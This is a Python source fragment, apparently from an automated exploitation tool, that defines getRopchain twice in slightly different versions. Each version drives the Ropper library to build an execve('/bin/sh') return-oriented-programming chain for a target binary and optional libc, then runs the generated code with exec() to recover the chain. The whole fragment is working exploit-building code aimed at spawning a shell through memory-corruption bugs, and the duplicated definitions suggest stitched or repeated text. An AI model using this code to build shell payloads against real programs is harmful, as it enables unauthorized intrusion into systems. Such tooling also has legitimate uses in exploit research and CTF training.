def getRopchain(properties, bad_bytes):
"""
' given n files, generate an execve rop chain and return it.
' I did not want to try and butcher ropper, so rs.createRopChain
' returns python code to print the rop chain to stdout
' I run it and steal the "rop" variable for my chain
'
' This is horrible code, do not repeat my mistakes
'badbytes': ''.join(bad_bytes),
"""
options = {
'color': False,
'badbytes': ''.join(bad_bytes),
'all': False,
'inst_count': 6,
'type': 'all',
'count_of_findings': 5,
'cfg_only': False,
'detailed': False
}
rs = RopperService(options)
if 'libc' in properties and properties['libc'] is not None:
rs.addFile(properties['libc'])
rs.addFile(properties['file'])
rs.loadGadgetsFor()
'''Acceptable arches are formated differently than pwntools:
x86
x86_64
ARM
... see https://github.com/sashs/Ropper/blob/a708fae670eece2b86daeaa276b38cb033eab231/README.md'''
# These arches can span to mips and ppc
arch = 'x86'
if '64' in properties['protections']['arch']:
arch = 'x86_64'
elif 'arm' in properties['protections']['arch'].lower():
arch = 'ARM'
# If you were looking for good programming examples, you've
# come to the wrong place friend
chain = rs.createRopChain("execve", arch, {'cmd': '/bin/sh'})
chain = chain.replace(" '", " b'") # convert all strings to bytes
chain = chain.replace("print rop", "") # removes invalid print statement
if "Cannot create chain" in chain or 'INSERT' in chain:
print("[-] Failed to create rop chain. Try adding linked libraries")
if 'libc' not in properties or properties['libc'] is None:
print("[~] Try adding linked libc")
exit(0)
namespace = {}
exec(chain,
namespace) # rop variable created inside of "chain" python script
if 'libc' in properties:
rs.removeFile(properties['libc'])
rs.removeFile(properties['file'])
return namespace['rop']
def getRopchain(properties, bad_bytes):
options = {
'color': False,
'badbytes': ''.join(bad_bytes),
'all': False,
'inst_count': 6,
'type': 'all',
'count_of_findings': 5,
'cfg_only': False,
'detailed': False
}
rs = RopperService(options)
print(properties['libc'])
if 'libc' in properties and properties['libc'] is not None:
rs.addFile(properties['libc'])
rs.addFile(properties['file'])
rs.loadGadgetsFor()
'''Acceptable arches are formated differently than pwntools:
x86
x86_64
ARM
... see https://github.com/sashs/Ropper/blob/a708fae670eece2b86daeaa276b38cb033eab231/README.md'''
#These arches can span to mips and ppc
arch = 'x86'
if '64' in properties['protections']['arch']:
arch = 'x86_64'
elif 'arm' in properties['protections']['arch'].lower():
arch = 'ARM'
#If you were looking for good programming examples, you've
#come to the wrong place friend
chain = rs.createRopChain("execve", arch, {'cmd': '/bin/sh'})
if "Cannot create chain" in chain or 'INSERT' in chain:
print("[-] Failed to create rop chain. Try adding linked libraries")
if 'libc' not in properties or properties['libc'] is None:
print("[~] Try adding linked libc")
exit(0)
namespace = {}
exec(chain,
namespace) #rop variable created inside of "chain" python script
if 'libc' in properties:
rs.removeFile(properties['libc'])
rs.removeFile(properties['file'])
return namespace['rop']
